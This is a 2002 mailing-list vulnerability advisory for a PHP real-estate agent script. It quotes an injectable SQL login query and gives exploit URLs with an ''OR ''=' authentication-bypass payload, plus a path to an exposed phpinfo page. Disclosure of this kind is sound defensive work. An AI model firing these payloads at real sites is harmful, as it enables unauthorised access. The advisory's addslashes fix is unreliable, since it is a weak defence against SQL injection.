Informations : °°°°°°°°°°°°°° Version, Website : ? Problems : - phpinfo() - SQL Injection PHP Code/Location : °°°°°°°°°°°°°°°°°°° agentadmin.php : -------------------------------------------------------------- [...] } elseif ($agentname != "" OR $current_user != "") { $sql = "SELECT id FROM agents WHERE agent='$agentname' and agentpass='$agentpassword'"; $result = mysql_query($sql) or die("Couldn't execute query."); $num = mysql_numrows($result); if ($num == 1) { session_register("agentname"); session_register("agentpassword"); [...] session_register("current_user"); session_register("agent"); [...] -------------------------------------------------------------- admin/phpinfo.php : ----------- <? phpinfo(); ?> ----------- Exploits : °°°°°°°°°° http://[target]/agentadmin.php?agentname='%20OR%20''='&agentpassword='%20OR%20''=' or http://[target]/agentadmin.php?agentname=[USERNAME]&agentpasword='%20OR%20''=' http://[target]/admin/phpinfo.php Solutions : °°°°°°°°°°° - Delete /admin/phpinfo.php - Put this lines : ------------------------------------------ $agentname=addslashes($agentname); $currentuser=addslashes($currentuser); $agentpassword=addslashes($agentpassword); ------------------------------------------ into common.php. A patch can be found on http://www.phpsecure.org. More details : °°°°°°°°°°°°°° In french : http://www.frog-man.org/tutos/Immoblier.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FImmoblier.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII frog-m@n _________________________________________________________________ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
This archive was generated by hypermail 2b30 : Tue Nov 26 2002 - 01:49:58 PST